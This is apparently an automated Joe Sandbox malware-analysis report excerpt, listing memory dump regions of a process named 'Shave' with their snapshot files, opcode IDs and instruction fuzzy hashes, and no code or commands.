                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8a1f49de54f475e5caf67f655629461260af20180d4f487c27c7be121a61bc3f
                                                                                                                                • Instruction ID: 31bc072ab650967b3a0c243e87f04111ae28dde66a01172b7f73803b18fc5ef6
                                                                                                                                • Opcode Fuzzy Hash: 8a1f49de54f475e5caf67f655629461260af20180d4f487c27c7be121a61bc3f
                                                                                                                                • Instruction Fuzzy Hash: 1071D174E00208CFDB08DFA9D980ADDBBB2BF89300F249129D919BB355DB35A946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3a2b4fa3f87f65e61bcf16dcd6a88eca1f01d1244b9f4fdf4d1a3b75b67dd0fb
                                                                                                                                • Instruction ID: ec7016d19c3b4ccb58ba0230b4936c332f5390fb1f201237c31b8c9534c3962a
                                                                                                                                • Opcode Fuzzy Hash: 3a2b4fa3f87f65e61bcf16dcd6a88eca1f01d1244b9f4fdf4d1a3b75b67dd0fb
                                                                                                                                • Instruction Fuzzy Hash: DE611274D00318DFDB15CFA5D854AAEBBB2FF88304F208529D809AB355DB395A4ACF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4838ce69ca896d3117c69f247e12d3ffbdc943a8c8ca03c9719fae5dc605c362
                                                                                                                                • Instruction ID: 6922763aececaf9fef31120ce5c021d982519625d5bb3b09a3a73daeef5496ef
                                                                                                                                • Opcode Fuzzy Hash: 4838ce69ca896d3117c69f247e12d3ffbdc943a8c8ca03c9719fae5dc605c362
                                                                                                                                • Instruction Fuzzy Hash: 76512471E052518FCB14DF78C8502AEBFF2AF89309B15856EC019DB351DB3A9C82CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 20be62fc93daec3b36faaca03d9378bc64363ce3d6525a79ca11f42060776fda
                                                                                                                                • Instruction ID: b201fcae45592c31bbf1b68f4e9cee3a17f8ade9addb0c3e99539c01059d7ec9
                                                                                                                                • Opcode Fuzzy Hash: 20be62fc93daec3b36faaca03d9378bc64363ce3d6525a79ca11f42060776fda
                                                                                                                                • Instruction Fuzzy Hash: 34517074E01208DFDB48DFA9D9949DDBBF2BF89300F209169E819AB365DB31A905CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7b408a464b733a8e349ee69e9f5583973bab7786e8a1b0f5348028979991f3e1
                                                                                                                                • Instruction ID: 7bbba5e51915486c2c5e165351a4626aa545c4d027cc62895af44a32ff667ee8
                                                                                                                                • Opcode Fuzzy Hash: 7b408a464b733a8e349ee69e9f5583973bab7786e8a1b0f5348028979991f3e1
                                                                                                                                • Instruction Fuzzy Hash: 84413071E016199BDB24DFA5C880ADEFBB5EF88710F24C569E405B7280DB70BA46CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0fbeaf86b45d1371f9e24b370db33bafb4a187a2f7be9e135220a20b8478ed75
                                                                                                                                • Instruction ID: 043176316a7c5bece33e2b8804d807728d4bcb7e5ad277c1f421505e3680a7af
                                                                                                                                • Opcode Fuzzy Hash: 0fbeaf86b45d1371f9e24b370db33bafb4a187a2f7be9e135220a20b8478ed75
                                                                                                                                • Instruction Fuzzy Hash: E541DD31A44248CFCF11CFA4C844AADBFB2BF49315F448255E9259F2A1D370E958CB62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8e5b2aa9574381c138545bff9811b719cb959ed37b1271a9403009767b4f599b
                                                                                                                                • Instruction ID: 6606060b75fefa3788fd10c4b15f05d536f14e8853045f829fd867e7c628ab2a
                                                                                                                                • Opcode Fuzzy Hash: 8e5b2aa9574381c138545bff9811b719cb959ed37b1271a9403009767b4f599b
                                                                                                                                • Instruction Fuzzy Hash: 1141CF74E00208CFDB14CFA5D5947EDBBF2BB48304F24816AD809B72A4DB356A4ACF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 184c1c80a4d92a8f04bb628f4dd83bc86d3a8d0e7d1304b39796b48fc2bdd23a
                                                                                                                                • Instruction ID: d016b244265078787715e5af2b8947b2bea498abd15a0ac97184fa8c459e851e
                                                                                                                                • Opcode Fuzzy Hash: 184c1c80a4d92a8f04bb628f4dd83bc86d3a8d0e7d1304b39796b48fc2bdd23a
                                                                                                                                • Instruction Fuzzy Hash: E2419D74E01208CFDB14DFA5D5947EDBBF2BB48300F24902AD819A72A4DB756A4ACF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ba196add2ade023cf592e997265be739c4c1628527637ce8e016c074cfff55f5
                                                                                                                                • Instruction ID: bed6b6bb45c69e10d3a550e79cc168842eadadc541dcf2c036372b0ad828de05
                                                                                                                                • Opcode Fuzzy Hash: ba196add2ade023cf592e997265be739c4c1628527637ce8e016c074cfff55f5
                                                                                                                                • Instruction Fuzzy Hash: 85417E30600245CFDB01CF68C844B6A7BF6EF89312F558466E928CF265D775DC45CBA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 828a078a5876b16429849f3b7bfdceaa1514b22b59a31d6c3ef71e1402854da4
                                                                                                                                • Instruction ID: a1b241e8896a9827f88684404d264557abc45ef69ac39861a8869b1bdb5977b9
                                                                                                                                • Opcode Fuzzy Hash: 828a078a5876b16429849f3b7bfdceaa1514b22b59a31d6c3ef71e1402854da4
                                                                                                                                • Instruction Fuzzy Hash: 70410574E01208CBDB08DFAAD8546DEBBF2AFC9304F10E02AD418BB254EB346906CF55
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6382b22caca8c99c17010dcd6e5e2b9068f371fd8ce68ad5b9ab9f98ac02a03d
                                                                                                                                • Instruction ID: a62766f44a9f026c38f3652b1152eefa434744bd8dee5ac6445e41e7ca7dfe76
                                                                                                                                • Opcode Fuzzy Hash: 6382b22caca8c99c17010dcd6e5e2b9068f371fd8ce68ad5b9ab9f98ac02a03d
                                                                                                                                • Instruction Fuzzy Hash: B5316C717041928FCB1A8B38988466EFB72EF8128034505E7ED19D71B1DB20FB45C792
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 10c23404121a592021b265b1cd9ab1537b2d86e12cbac078f04baf002cbd8df5
                                                                                                                                • Instruction ID: 3d7c3ee57056073b4be2007ecfe58c904c0ab1fefae2a6c8a60ac3fb7962513a
                                                                                                                                • Opcode Fuzzy Hash: 10c23404121a592021b265b1cd9ab1537b2d86e12cbac078f04baf002cbd8df5
                                                                                                                                • Instruction Fuzzy Hash: E831A331204149DFCF059F64D9A5AAE3BB3EF88341F608024FD199B255CB35DEA5DBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 42becba8c6c11e7906cfb5c10d46e1d5314fa3005c1b74e19639189b930b692d
                                                                                                                                • Instruction ID: 593f60691d89a2e7a73ddddb2aa5c71fc39b5b702468cdac7f08d1df27d7c30b
                                                                                                                                • Opcode Fuzzy Hash: 42becba8c6c11e7906cfb5c10d46e1d5314fa3005c1b74e19639189b930b692d
                                                                                                                                • Instruction Fuzzy Hash: D5311C74E012488FDB19DFAAC9446DDFBF2AF89300F24C169D819BB265DB34A906CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 26b53b6c209c1ac681efc85125cb8975dd879caf89d7800506f43aea21b9f16c
                                                                                                                                • Instruction ID: e941b13eb2f0a77307dfcfa81b094641c49537ab3096d8a56d144e04d9f7a6e6
                                                                                                                                • Opcode Fuzzy Hash: 26b53b6c209c1ac681efc85125cb8975dd879caf89d7800506f43aea21b9f16c
                                                                                                                                • Instruction Fuzzy Hash: C231E275E012088BDB18DFAAE8546EDBBF2BF89304F14D12AD419BB254EB345906CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e7929b834227c95dee7b112424fc1a5f9825ba5ef47f6970a484788cd2753045
                                                                                                                                • Instruction ID: cb930ccb48863be10332b8d10407213ef5f23a2105f1108a8da5a9abcdc968dd
                                                                                                                                • Opcode Fuzzy Hash: e7929b834227c95dee7b112424fc1a5f9825ba5ef47f6970a484788cd2753045
                                                                                                                                • Instruction Fuzzy Hash: AF31D874E012088FDB08DFAAD5406DDFBF2AF89304F24D12AC419BB264EB34A946CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9015dc8761d5ad16dcaee8d68906c593899c5eff486fc874a73d56b2eaf1f08f
                                                                                                                                • Instruction ID: 02a1f508d355afc08c6bf50bc2b16ca7277925bb9c1075d22ef6729260b683e6
                                                                                                                                • Opcode Fuzzy Hash: 9015dc8761d5ad16dcaee8d68906c593899c5eff486fc874a73d56b2eaf1f08f
                                                                                                                                • Instruction Fuzzy Hash: DA3124B2D002199BCB10DFAAD884BDEFFF4FF49310F10855AE918A7240C378A944CBA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: acee2cd537cc3cd181098fae542633c381183bf089788c9747dc6c47c821a9b9
                                                                                                                                • Instruction ID: 1b566a1a84de701283565b48660066d8076e57176e60c32813b6841fd70fe7e8
                                                                                                                                • Opcode Fuzzy Hash: acee2cd537cc3cd181098fae542633c381183bf089788c9747dc6c47c821a9b9
                                                                                                                                • Instruction Fuzzy Hash: 8031D274E002488FDB18DFAAD8446EDFBB2AF89300F54D16AC819BB265EB345946CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4c413e936cab05148f777a944132e4413b1ed161b87865ab0b17a6ac0e74667f
                                                                                                                                • Instruction ID: 52cd1afc7e2c9e29b62e957ceb7ce86566a97d47aa28bb0a46c019123ad36235
                                                                                                                                • Opcode Fuzzy Hash: 4c413e936cab05148f777a944132e4413b1ed161b87865ab0b17a6ac0e74667f
                                                                                                                                • Instruction Fuzzy Hash: 9831D374E012088BDB08DFAAD5446DEBBF3AF89304F64D02AC419BB254EB35A906CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c5343bfdcbb8bd259b70db6d3c8177719766fa1eef961ebf485267a0e0988ab4
                                                                                                                                • Instruction ID: 5b6fede44f47be3300e36d1091efa1c0a8a0d4df1f76759af5e8cb12d2fd6c2b
                                                                                                                                • Opcode Fuzzy Hash: c5343bfdcbb8bd259b70db6d3c8177719766fa1eef961ebf485267a0e0988ab4
                                                                                                                                • Instruction Fuzzy Hash: F0311771E00208CBDB18DFAAD9446DEBBF2AFD9300F24D129D518BB254EB345942CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 83adcef9813d426452d62f9df5604465b1861605aafaf2ec9c638ef99e14cde3
                                                                                                                                • Instruction ID: 63096583b78a054fb693ea407870405a595f07b0f2e13ec78be2f015f100efb1
                                                                                                                                • Opcode Fuzzy Hash: 83adcef9813d426452d62f9df5604465b1861605aafaf2ec9c638ef99e14cde3
                                                                                                                                • Instruction Fuzzy Hash: B331B374E01208DBDB08DFAAD9446DDBBF2AF89304F64D02AD519BB254EB35A906CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c642acabe7ab297442ab450bd4f4703af6848cd969b7fe9dd1969b36ce9ee742
                                                                                                                                • Instruction ID: 3fbf270096471921c506af0a060d6b8935e48feb10cd135a446e08bf0b9552d6
                                                                                                                                • Opcode Fuzzy Hash: c642acabe7ab297442ab450bd4f4703af6848cd969b7fe9dd1969b36ce9ee742
                                                                                                                                • Instruction Fuzzy Hash: 9531C274E05648CBEB08DFAAD8406EDBBF2AF89300F50D12AD418BB355DB749906CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fb797405247171496d7875ff88e31cda213238c40dfe36eadd50dbbefda877f2
                                                                                                                                • Instruction ID: aba00de9d72d5840ced2bb3acb3699be507c731e52fc5de54a2dc5256296b7c2
                                                                                                                                • Opcode Fuzzy Hash: fb797405247171496d7875ff88e31cda213238c40dfe36eadd50dbbefda877f2
                                                                                                                                • Instruction Fuzzy Hash: 8E21E231304242CFCB151B398854B7E36A6AFD570A7154039DC16DF6A5EF29CC4BD752
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 114decdc01f0744907f82f3bb671f90c863b88d1470e1697c92c5173dc34160d
                                                                                                                                • Instruction ID: 179e8a800783e3f2d2cde906ba044dbf78ac0364446c486aef700050362ead42
                                                                                                                                • Opcode Fuzzy Hash: 114decdc01f0744907f82f3bb671f90c863b88d1470e1697c92c5173dc34160d
                                                                                                                                • Instruction Fuzzy Hash: B4419575E01208CFCB48DFA9D98499DBBF2BF89301F208029E815BB324DB34A946CF14
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1bc0fefd0e56a7da5c7c3ec026e1635b325274b00c0deca188bdd2bf6f19a4e3
                                                                                                                                • Instruction ID: ce488566f10e17723db8f1064bb16126096a7890adbefd832fbc098612145688
                                                                                                                                • Opcode Fuzzy Hash: 1bc0fefd0e56a7da5c7c3ec026e1635b325274b00c0deca188bdd2bf6f19a4e3
                                                                                                                                • Instruction Fuzzy Hash: 10216D31300202CBDB185B298854B7A3696AFD475AF248039DD16DF7A8EF69CC87D391
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 09c89399d5a4d4c660936e5ee424869f047d12c83eeb99007b596c9c474a9b82
                                                                                                                                • Instruction ID: 9e73241c3ca8fede788c3182e54c36e484b14c3e8ff802a0f233a9643d2fe793
                                                                                                                                • Opcode Fuzzy Hash: 09c89399d5a4d4c660936e5ee424869f047d12c83eeb99007b596c9c474a9b82
                                                                                                                                • Instruction Fuzzy Hash: 2D113A62265D078FE3142770DCAC62B3962FB4B317F446D16920B765F24F3819058D6B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2e118729111b5563f93849d95deeeb65b5f60a56802e9eee8dcf531f6b0ea69f
                                                                                                                                • Instruction ID: f3a9501f6585e4e66124d05fe55b99b48e96140662733b6fb112309876dbea49
                                                                                                                                • Opcode Fuzzy Hash: 2e118729111b5563f93849d95deeeb65b5f60a56802e9eee8dcf531f6b0ea69f
                                                                                                                                • Instruction Fuzzy Hash: 31314BB5D012199FCB10CFA9D4846DEFFF4EF48320F108259E818AB281D774A944CFA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: afa9a040ad16b5be5fde61d6500c6d2af3bd146b49b8ec8ccd26cac473955061
                                                                                                                                • Instruction ID: b9eb45cab09be89829f8da5edee15aae0c937d26919d7e954fddf633a022d4a4
                                                                                                                                • Opcode Fuzzy Hash: afa9a040ad16b5be5fde61d6500c6d2af3bd146b49b8ec8ccd26cac473955061
                                                                                                                                • Instruction Fuzzy Hash: EF219F70A042089BEB04EBB8D8546EEBBBBFF88311F504129E405B7294DF319D45CB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 53fd7002ca0c05f1e996906e564b9587001d7e0ed37104b72cfd6594509927e3
                                                                                                                                • Instruction ID: ee5ad39d079721a18c7a7ad9ed419297ca34bb8e9597c3b09a7e81777ccf0057
                                                                                                                                • Opcode Fuzzy Hash: 53fd7002ca0c05f1e996906e564b9587001d7e0ed37104b72cfd6594509927e3
                                                                                                                                • Instruction Fuzzy Hash: 43216D36A00115DFCB14DF64D8409AEB7A5EB9E368F24C019D81A9B340DB35EE4BCBD2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ddf9b882066f69f0db001adfa7457bcf64ed00f79a45dd7a595b444488656f3c
                                                                                                                                • Instruction ID: 8ca1436b5ae24f67f8046532f7d3fa6e87d8052c59589370b3e357c01bf9e0e7
                                                                                                                                • Opcode Fuzzy Hash: ddf9b882066f69f0db001adfa7457bcf64ed00f79a45dd7a595b444488656f3c
                                                                                                                                • Instruction Fuzzy Hash: 1421D135300511CBC7199B29C85892EB7A2FFC57967654038E81EDB764CF30DC068BD0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f0fca67661d53717957ddb7926d3843485de8b2cb468bcf21c51684c1c36e7df
                                                                                                                                • Instruction ID: f60f203391cd4962743e564bbcae3409dc6fe4de51db4f33f7a1051134a902c2
                                                                                                                                • Opcode Fuzzy Hash: f0fca67661d53717957ddb7926d3843485de8b2cb468bcf21c51684c1c36e7df
                                                                                                                                • Instruction Fuzzy Hash: B8210431209288CFCB019F24D964BAA3BB2EF49351F604079FC199F256CB349D65DBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 69b869f5d43da15a42891e62441d4805d7c41c8f7112bb48429f889cb2223659
                                                                                                                                • Instruction ID: 2311de1b7e449cc99781e3839c0fc2457ab4a6750725fb95328d38ef7cb776d9
                                                                                                                                • Opcode Fuzzy Hash: 69b869f5d43da15a42891e62441d4805d7c41c8f7112bb48429f889cb2223659
                                                                                                                                • Instruction Fuzzy Hash: 7D11EB317082546FCB06AF7C98256AF7FA79FC9250B10856AE906D7396DE384D02C7E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fe8c7c82f99b41b4677068fd60f9d93ddd516366ac9a6d2a5953beedfc6b7ddf
                                                                                                                                • Instruction ID: b98ff589acf3cd7c304728fb343dc0da534b853da997eb107b7ba6c86411e63a
                                                                                                                                • Opcode Fuzzy Hash: fe8c7c82f99b41b4677068fd60f9d93ddd516366ac9a6d2a5953beedfc6b7ddf
                                                                                                                                • Instruction Fuzzy Hash: 02319078E11308CFCB48DFA8D59489DBBB2FF49305B208069E81AAB364D731AD56CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
